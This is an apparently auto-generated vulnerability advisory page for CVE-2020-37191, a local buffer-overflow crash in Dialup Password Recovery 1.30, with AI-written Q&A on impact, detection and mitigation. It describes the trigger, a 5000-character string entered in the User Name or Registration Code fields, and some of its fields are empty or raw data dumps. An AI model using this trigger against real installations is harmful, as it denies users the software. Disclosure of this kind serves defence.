CVE-2020-37191
Denial of Service via Input Overflow in Dialup Password Recovery
Publication date: 2026-02-11
Last updated on: 2026-02-12
Assigner: VulnCheck
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| top_password_software | dialup_password_recovery | to 1.30 (exc) |
| top_password_software | dialup_password_recovery | 1.30 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-120 | The product copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2020-37191 is a denial of service vulnerability in Top Password Software Dialup Password Recovery version 1.30 and earlier. It occurs because the software does not properly check the size of input fields, leading to a buffer overflow when a large payload of about 5000 characters is inserted into the User Name or Registration Code fields.
This overflow causes the application to crash, making it unavailable to legitimate users.
How can this vulnerability impact me? :
The primary impact of this vulnerability is a denial of service condition where the application crashes and becomes unusable.
An attacker can exploit this by locally providing a specially crafted input of 5000 characters into the User Name or Registration Code fields, causing the software to stop functioning.
This can disrupt normal operations that depend on the software, potentially causing downtime or loss of access to password recovery functionality.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
[{'type': 'paragraph', 'content': 'This vulnerability can be detected by attempting to input a large payload of approximately 5000 characters into the User Name and Registration Code input fields of the Top Password Software Dialup Password Recovery application. If the application crashes or becomes unresponsive, it indicates the presence of the vulnerability.'}, {'type': 'paragraph', 'content': "A practical detection method is to use a script or command that inputs a 5000-character string (such as 5000 'A's) into these fields and observe the application's behavior."}, {'type': 'paragraph', 'content': 'For example, a simple Python script can be used to generate the payload and write it to a file, which can then be used as input to the application to trigger the crash.'}] [1, 2]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include avoiding the use of the vulnerable input fields with excessively large inputs, especially inputs around 5000 characters, to prevent triggering the denial of service condition.
Restrict access to the application to trusted users only, as the attack requires local access and user interaction.
Monitor and limit input sizes in the User Name and Registration Code fields if possible, to prevent buffer overflow.
Check for any available patches or updates from the vendor and apply them as soon as they become available.